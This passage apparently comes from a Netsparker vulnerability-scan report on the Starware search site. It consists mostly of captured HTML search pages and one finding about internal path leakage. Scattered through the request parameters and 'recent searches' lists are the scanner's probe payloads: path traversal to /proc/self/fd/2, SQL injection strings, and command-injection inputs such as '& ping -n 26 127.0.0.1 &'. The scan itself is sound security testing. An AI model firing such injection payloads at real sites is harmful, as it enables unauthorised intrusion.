href="/dp/search?qry=Proc&qry_lnk=Proc&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">Proc</a></p><p><a href="/dp/search?qry=FD+Services&qry_lnk=FD+Services&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">FD Services</a></p><p><a href="/dp/search?qry=Linux%E3%82%B3%E3%83%9E%E3%83%B3%E3%83%89&qry_lnk=Linux%E3%82%B3%E3%83%9E%E3%83%B3%E3%83%89&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">Linuxコマンド</a></p><p><a href="/dp/search?qry=Part+Time+FD&qry_lnk=Part+Time+FD&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">Part Time FD</a></p><p><a href="/dp/search?qry=dboX+2+Linux&qry_lnk=dboX+2+Linux&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">dboX 2 Linux</a></p><p><a href="/dp/search?qry=FD+Systems&qry_lnk=FD+Systems&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">FD Systems</a></p><p><a href="/dp/search?qry=FD+FinePix&qry_lnk=FD+FinePix&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">FD FinePix</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=http%3A%2F%2Fnetsparker.com%2Fn&qry_lnk=http%3A%2F%2Fnetsparker.com%2Fn&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">http://netsparker.com/n</a></p><p><a href="/dp/search?qry=xss&qry_lnk=xss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">xss</a></p><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Hack</a></p><p><a href="/dp/search?qry=%27%26expr+268409241+-+2+%26%27&qry_lnk=%27%26expr+268409241+-+2+%26%27&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">'&expr 268409241 - 2 &'</a></p><p><a href="/dp/search?qry=%22%26expr+268409241+-+2+%26%22&qry_lnk=%22%26expr+268409241+-+2+%26%22&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">"&expr 268409241 - 2 &"</a></p><p><a href="/dp/search?qry=-1+OR+17-7%3D10&qry_lnk=-1+OR+17-7%3D10&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">-1 OR 17-7=10</a></p><p><a href="/dp/search?qry=%27+OR+%27ns%27%3D%27ns&qry_lnk=%27+OR+%27ns%27%3D%27ns&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">' OR 'ns'='ns</a></p><p><a href="/dp/search?qry=Hack+AND+%27NS%3D%27ss&qry_lnk=Hack+AND+%27NS%3D%27ss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Hack AND 'NS='ss</a></p><p><a href="/dp/search?qry=HackNS_NO&qry_lnk=HackNS_NO&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">HackNS_NO</a></p><p><a href="/dp/search?qry=%27&qry_lnk=%27&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">'</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=305">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>../../../../../../../../../../proc/self/...</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=ChAlh7mr_TYm1Leug0AGm4pWeCMXlst4B3bWqvhaBi-2zKBABIIemgQgoBlC-g-WY-v____8BYMkGoAGnz9z-A8gBAaoEHk_QMM_ey1PyLzt92d17SdMq4QsufMuYqQWJjVToSQ&num=1&sig=AGiWqtyCHp4_HJF-IpAW4QVKmokgtKyjIw&adurl=http://m1612.ic-live.com/465/%3F120696371%26OVMTC%3DPhrase%26site%3D%26creative%3D5929011021%26OVKEY%3Dfd-2" onmouseover="window.status='http://www.newark.com/<b>fd-2</b>';return true;" onmouseout="window.status='';return true;">Looking for <b>Fd-2</b>?</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=ChAlh7mr_TYm1Leug0AGm4pWeCMXlst4B3bWqvhaBi-2zKBABIIemgQgoBlC-g-WY-v____8BYMkGoAGnz9z-A8gBAaoEHk_QMM_ey1PyLzt92d17SdMq4QsufMuYqQWJjVToSQ&num=1&sig=AGiWqtyCHp4_HJF-IpAW4QVKmokgtKyjIw&adurl=http://m1612.ic-live.com/465/%3F120696371%26OVMTC%3DPhrase%26site%3D%26creative%3D5929011021%26OVKEY%3Dfd-2" onmouseover="window.status='http://www.newark.com/<b>fd-2</b>';return true;" onmouseout="window.status='';return true;">Techspray products in stock and ready for immediate shipping!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=ChAlh7mr_TYm1Leug0AGm4pWeCMXlst4B3bWqvhaBi-2zKBABIIemgQgoBlC-g-WY-v____8BYMkGoAGnz9z-A8gBAaoEHk_QMM_ey1PyLzt92d17SdMq4QsufMuYqQWJjVToSQ&num=1&sig=AGiWqtyCHp4_HJF-IpAW4QVKmokgtKyjIw&adurl=http://m1612.ic-live.com/465/%3F120696371%26OVMTC%3DPhrase%26site%3D%26creative%3D5929011021%26OVKEY%3Dfd-2" onmouseover="window.status='http://www.newark.com/<b>fd-2</b>';return true;" onmouseout="window.status='';return true;">www.newark.com/<b>fd-2</b></a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CrTaD7mr_TYm1Leug0AGm4pWeCILyxdwB8on3rBnl58SCARACIIemgQgoBlDc3Kmy-f____8BYMkGoAG3gqL_A8gBAaoEG0_QAOray1DyLzt9kd2nYwhFZ8YcAcFZniEEkA&num=2&sig=AGiWqtzXU-M_K-B5f7zhMr1EamLGy3C4wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D896732696%26CAPCID%3D6713607970" onmouseover="window.status='http://www.mcmelectronics.com/Plato';return true;" onmouseout="window.status='';return true;">Plato</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CrTaD7mr_TYm1Leug0AGm4pWeCILyxdwB8on3rBnl58SCARACIIemgQgoBlDc3Kmy-f____8BYMkGoAG3gqL_A8gBAaoEG0_QAOray1DyLzt9kd2nYwhFZ8YcAcFZniEEkA&num=2&sig=AGiWqtzXU-M_K-B5f7zhMr1EamLGy3C4wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D896732696%26CAPCID%3D6713607970" onmouseover="window.status='http://www.mcmelectronics.com/Plato';return true;" onmouseout="window.status='';return true;">Plato Tools In Stock At MCM Electronics. Ships Today!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CrTaD7mr_TYm1Leug0AGm4pWeCILyxdwB8on3rBnl58SCARACIIemgQgoBlDc3Kmy-f____8BYMkGoAG3gqL_A8gBAaoEG0_QAOray1DyLzt9kd2nYwhFZ8YcAcFZniEEkA&num=2&sig=AGiWqtzXU-M_K-B5f7zhMr1EamLGy3C4wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D896732696%26CAPCID%3D6713607970" onmouseover="window.status='http://www.mcmelectronics.com/Plato';return true;" onmouseout="window.status='';return true;">www.mcmelectronics.com/Plato</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CJxEK7mr_TYm1Leug0AGm4pWeCPT8yvkBvMHH7Bvp68WTAhADIIemgQgoBlDGsbiaBWDJBsgBAaoEG0_QUPPiy1HyLzt9kd2nYwhFZ8YcAcFZniEEiA&num=3&sig=AGiWqtzqNHPLBuBRsl6deapGquzT-aFGcQ&adurl=http://www.registrarcorp.com%3Fs_kwcid%3DTC%7C9240%7CFDA%2520procedure%7C%7CS%7Cb%7C7384756332" onmouseover="window.status='http://www.registrarcorp.com/<b>FD</b>A-Requirements';return true;" onmouseout="window.status='';return true;">U.S. FDA Requirements</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CJxEK7mr_TYm1Leug0AGm4pWeCPT8yvkBvMHH7Bvp68WTAhADIIemgQgoBlDGsbiaBWDJBsgBAaoEG0_QUPPiy1HyLzt9kd2nYwhFZ8YcAcFZniEEiA&num=3&sig=AGiWqtzqNHPLBuBRsl6deapGquzT-aFGcQ&adurl=http://www.registrarcorp.com%3Fs_kwcid%3DTC%7C9240%7CFDA%2520procedure%7C%7CS%7Cb%7C7384756332" onmouseover="window.status='http://www.registrarcorp.com/<b>FD</b>A-Requirements';return true;" onmouseout="window.status='';return true;">Assisting Companies Comply With US FDA Requirements</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CJxEK7mr_TYm1Leug0AGm4pWeCPT8yvkBvMHH7Bvp68WTAhADIIemgQgoBlDGsbiaBWDJBsgBAaoEG0_QUPPiy1HyLzt9kd2nYwhFZ8YcAcFZniEEiA&num=3&sig=AGiWqtzqNHPLBuBRsl6deapGquzT-aFGcQ&adurl=http://www.registrarcorp.com%3Fs_kwcid%3DTC%7C9240%7CFDA%2520procedure%7C%7CS%7Cb%7C7384756332" onmouseover="window.status='http://www.registrarcorp.com/<b>FD</b>A-Requirements';return true;" onmouseout="window.status='';return true;">www.registrarcorp.com/<b>FD</b>A-Requirements</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=COkzW7mr_TYm1Leug0AGm4pWeCPS9xuQB_L_N1hbguLYFEAQgh6aBCCgGULXs3whgyQbIAQGqBBhP0BDgxctW8i87fcjc2-XFdxrM3Tbl1Js&num=4&sig=AGiWqtwFD7uHKyzamdQpXusfO4nVEzfiRg&adurl=http://www.healthline.com/hlvideo-5min/ringworm-or-athletes-foot-165130614%3Futm_source%3Dserp_general_health%26utm_medium%3Dgoogle%26utm_channel%3Dvideo%26utm_term%3Dprocedure" onmouseover="window.status='http://www.healthline.com';return true;" onmouseout="window.status='';return true;">Procedure</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=COkzW7mr_TYm1Leug0AGm4pWeCPS9xuQB_L_N1hbguLYFEAQgh6aBCCgGULXs3whgyQbIAQGqBBhP0BDgxctW8i87fcjc2-XFdxrM3Tbl1Js&num=4&sig=AGiWqtwFD7uHKyzamdQpXusfO4nVEzfiRg&adurl=http://www.healthline.com/hlvideo-5min/ringworm-or-athletes-foot-165130614%3Futm_source%3Dserp_general_health%26utm_medium%3Dgoogle%26utm_channel%3Dvideo%26utm_term%3Dprocedure" onmouseover="window.status='http://www.healthline.com';return true;" onmouseout="window.status='';return true;">Find the right answers about symptoms, ca..
[Possible] Internal Path Leakage (Windows)
[Possible] Internal Path Leakage (Windows)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
Error messages should be disabled.
Remove this kind of sensitive data from the output.
External References
C:\Documents and Settings
Request
GET /dp/search?qry=ping%20-n%2026%20127.0.0.1%20%26&qry_lnk=Hack&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C1308584649-18-1-Q29va2llcw%3D%3D%2C1308584674-1-1-IiYgcGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%2C1308584675-4-1-JyYgcGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%2C1308584676-1-1-JiBwaW5nIC1uIDI2IDEyNy4wLjAuMSAm%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:44:36 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:44:37 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C1308584649-18-1-Q29va2llcw%3D%3D%2C1308584674-1-1-IiYgcGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%2C1308584675-4-1-JyYgcGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%2C1308584676-1-1-JiBwaW5nIC1uIDI2IDEyNy4wLjAuMSAm%2C1308584677-0--cGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware ping -n 26 127.0.0.1 & Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '305'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/ping+-n+26+127.0.0.1+%26">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=ping+-n+26+127.0.0.1+%26" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="305"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="ping -n 26 127.0.0.1 &" class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=305&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9cGluZyUyMC1uJTIwMjYlMjAxMjcuMC4wLjElMjAlMjYmcXJ5X2xuaz1IYWNrJnNyY19pZD0zMDUmY2xpZW50X2lkPTMmcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnN1YnByb2R1Y3Q9c2l0ZSZ2ZXJzaW9uPTMmaXQ9LTEmc3RlcD0yJnJzX3ByZXY9eHNz">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Ping+Pong&qry_lnk=Ping+Pong&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Pong</a></p><p><a href="/dp/search?qry=Test+IP+Ping&qry_lnk=Test+IP+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Test IP Ping</a></p><p><a href="/dp/search?qry=Ping+Golf+Clubs&qry_lnk=Ping+Golf+Clubs&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Golf Clubs</a></p><p><a href="/dp/search?qry=Ping+Driver&qry_lnk=Ping+Driver&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Driver</a></p><p><a href="/dp/search?qry=Blog+Ping&qry_lnk=Blog+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Blog Ping</a></p><p><a href="/dp/search?qry=ARP+Ping&qry_lnk=ARP+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">ARP Ping</a></p><p><a href="/dp/search?qry=Ping+Meter&qry_lnk=Ping+Meter&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Meter</a></p><p><a href="/dp/search?qry=Ping+Media&qry_lnk=Ping+Media&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Media</a></p><p><a href="/dp/search?qry=Ping+Server+Monitor&qry_lnk=Ping+Server+Monitor&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Server Monitor</a></p><p><a href="/dp/search?qry=Ping+Time&qry_lnk=Ping+Time&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26&serv=web">Ping Time</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=%26+ping+-n+26+127.0.0.1+%26&qry_lnk=%26+ping+-n+26+127.0.0.1+%26&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">& ping -n 26 127.0.0.1 &</a></p><p><a href="/dp/search?qry=%27%26+ping+-n+26+127.0.0.1+%26&qry_lnk=%27%26+ping+-n+26+127.0.0.1+%26&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">'& ping -n 26 127.0.0.1 &</a></p><p><a href="/dp/search?qry=%22%26+ping+-n+26+127.0.0.1+%26&qry_lnk=%22%26+ping+-n+26+127.0.0.1+%26&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">"& ping -n 26 127.0.0.1 &</a></p><p><a href="/dp/search?qry=Cookies&qry_lnk=Cookies&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Cookies</a></p><p><a href="/dp/search?qry=xss&qry_lnk=xss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">xss</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=305">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="al-1" class="al b"><h1>Web Search Results for <b>ping -n 26 127.0.0.1 &</b></h1><h2>Results <b>1</b>-<b>10</b> of about <b>30,600</b></h2><div><p class="t"><a href="http://www.windowsitpro.com/community/forums/aft/49081"><b>Ping</b> always resolve <b>127.0.0.1</b> - Windows IT Pro - Reader Forums <b>...</b></a></p><p class="s"><a>I have added this to my hosts file 127.0.0.2 mysite.com but when i try to <b>ping</b> <br> 127.0.0.2 it always response <b>127.0.0.1</b> why???</a></p><p class="h"><a href="http://www.windowsitpro.com/community/forums/aft/49081">www.windowsitpro.com<wbr/>/community<wbr/>/forums<wbr/>/aft<wbr/>/49081</a></p></div><div><p class="t"><a href="http://forums.freebsd.org/showthread.php?t=17267">[Solved] <b>ping</b> -f <b>127.0.0.1</b> - The FreeBSD Forums</a></p><p class="s"><a>[Solved] <b>ping</b> -f <b>127.0.0.1</b> Off-Topic. <b>...</b> Old August <b>26th</b>, 2010, 10:33 <b>...</b> why <br> is there 30% pacet loss when <b>pinging 127.0.0.1</b>? <b>...</b></a></p><p class="h"><a href="http://forums.freebsd.org/showthread.php?t=17267">forums.freebsd.org<wbr/>/showthread.php<wbr/>?t=17267</a></p></div><div><p class="t"><a href="http://forums.zend.com/viewtopic.php?f=8&t=12083">Zend Forums • View topic - Server stopped serving a directory of PHP</a></p><p class="s"><a><b>127.0.0.1</b> - - [<b>26</b>/Apr/2011:15:48:41 -0500] "POST /ZendServer/index.php?<br> controller=systray&action=exec&do=<b>ping</b> HTTP/1.1" 200 180 <b>...</b></a></p><p class="h"><a href="http://forums.zend.com/viewtopic.php?f=8&t=12083">forums.zend.com<wbr/>/viewtopic.php<wbr/>?f=8<wbr/>&t=12083</a></p></div><div><p class="t"><a href="http://forumremotescan.com/viewtopic.php?f=4&t=1717">RemoteScan Support Forum • View topic - Error: User Cancelled</a></p><p class="s"><a>Jan 07, 2008 04:29:<b>26</b> PM: Connection from <b>127.0.0.1</b>. Jan 07, 2008 04:29:<b>26</b> PM: <br> <b>Ping</b> from workstation NF-31 (NF-31) Jan 07, 2008 04:29:<b>26</b> PM: <b>...</b></a></p><p class="h"><a href="http://forumremotescan.com/viewtopic.php?f=4&t=1717">forumremotescan.com<wbr/>/viewtopic.php<wbr/>?f=4<wbr/>&t=1717</a></p></div><div><p class="t"><a href="http://wiki.basho.com/HTTP-Ping.html">Basho: HTTP <b>Ping</b></a></p><p class="s"><a>Jul 16, 2010 <b>...</b> curl -v http://<b>127.0.0.1</b>:8098/<b>ping</b> * About to connect() to <b>127.0.0.1</b> port 8098 (<br> #0) <b>...</b> 16 Jul 2010 02:34:<b>26</b> GMT < Content-Type: text/html <b>...</b></a></p><p class="h"><a href="http://wiki.basho.com/HTTP-Ping.html">wiki.basho.com<wbr/>/HTTP<wbr/>-Ping.html</a></p></div><div><p class="t"><a href="http://forums.devshed.com/dev-shed-lounge-26/ping-127-0-0-1-fails-on-winme-31198.html"><b>Ping 127.0.0.1</b> Fails on WinME - Dev Shed</a></p><p class="s"><a>Feb 22, 2002 <b>...</b> <b>Ping 127.0.0.1</b> Fails on WinME- Dev Shed Lounge. Visit Dev Shed to discuss <b>Ping</b> <br> <b>127.0.0.1</b> Fails on WinME.</a></p><p class="h"><a href="http://forums.devshed.com/dev-shed-lounge-26/ping-127-0-0-1-fails-on-winme-31198.html">forums.devshed.com<wbr/>/dev<wbr/>-shed<wbr/>-lounge<wbr/>-26<wbr/>/ping<wbr/>-127<wbr/>-0<wbr/>-0<wbr/>-1<wbr/>-fails<wbr/>-on<wbr/>-winme<wbr/>-31198.html</a></p></div><div><p class="t"><a href="http://superuser.com/questions/29720/general-failure-when-pinging-to-127-0-0-1">windows 7 - "GENERAL FAILURE" when <b>pinging</b> to <b>127.0.0.1</b> - Super User</a></p><p class="s"><a>Aug 25, 2009 <b>...</b> “GENERAL FAILURE” when <b>pinging</b> to <b>127.0.0.1</b> [closed] <b>...</b> more details? maybe a <br> screenshot of ipconfig /all – Molly7244 Aug <b>26</b> '09 at 0:24 <b>...</b></a></p><p class="h"><a href="http://superuser.com/questions/29720/general-failure-when-pinging-to-127-0-0-1">superuser.com<wbr/>/questions<wbr/>/29720<wbr/>/general<wbr/>-failure<wbr/>-when<wbr/>-pinging<wbr/>-to<wbr/>-127<wbr/>-0<wbr/>-0<wbr/>-1</a></p></div><div><p class="t"><a href="http://www.webhostingtalk.com/archive/index.php/t-212689.html">What is a good <b>ping</b> result? [Archive] - Web Hosting Talk</a></p><p class="s"><a>[Archive] What is a good <b>ping</b> result? Web Hosting. <b>...</b> C:\Documents and Settings<br> \XP><b>ping 127.0.0.1</b>. <b>Pinging 127.0.0.1</b> with 32 bytes of data: <b>...</b> 12-02-2003, 08:<br> <b>26</b> PM. I believe a constant stable <b>ping</b> would be best. <b>...</b></a></p><p class="h"><a href="http://www.webhostingtalk.com/archive/index.php/t-212689.html">www.webhostingtalk.com<wbr/>/archive<wbr/>/index.php<wbr/>/t<wbr/>-212689.html</a></p></div><div><p class="t"><a href="http://forums.fedoraforum.org/archive/index.php/t-145765.html"><b>ping</b> localhost isn't working! [Archive] - FedoraForum.org</a></p><p class="s"><a>[Archive] <b>ping</b> localhost isn't working! Networking. <b>...</b> <b>26th</b> January 2007, 10:15 <br> AM <b>...</b> Is it not suppose to be <b>127.0.0.1</b>? more hosts <b>...</b></a></p><p class="h"><a href="http://forums.fedoraforum.org/archive/index.php/t-145765.html">forums.fedoraforum.org<wbr/>/archive<wbr/>/index.php<wbr/>/t<wbr/>-145765.html</a></p></div><div><p class="t"><a href="http://www.sevenforums.com/network-sharing/71233-network-drop-bad-localhost-ping-under-7-64bits.html">Network drop (bad localhost <b>ping</b>) under 7-64bits - Windows 7 Forums</a></p><p class="s"><a>Mar 15, 2010 <b>...</b> After the restart I tried to <b>ping</b> again <b>127.0.0.1 and</b> here is the result. <b>...</b> <br> vendredi <b>26</b> mars 2010 00:35:00. Passerelle par défaut. . . .*. <b>...</b></a></p><p class="h"><a href="http://www.sevenforums.com/network-sharing/71233-network-drop-bad-localhost-ping-under-7-64bits.html">www.sevenforums.com<wbr/>/network<wbr/>-sharing<wbr/>/71233<wbr/>-network<wbr/>-drop<wbr/>-bad<wbr/>-localhost<wbr/>-ping<wbr/>-under<wbr/>-7<wbr/>-64bits.html</a></p></div></div><table id="rs-2" class="rs"><tr><td colspan="3" class="t">10 Related Results</td></tr><tr><td><a target="_main" href="/dp/search?qry=Ping+Pong&qry_lnk=Ping+Pong&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=ping+-n+26+127.0.0.1+%26">Ping Pong</a></td><td><a target="_main" href="/dp/se..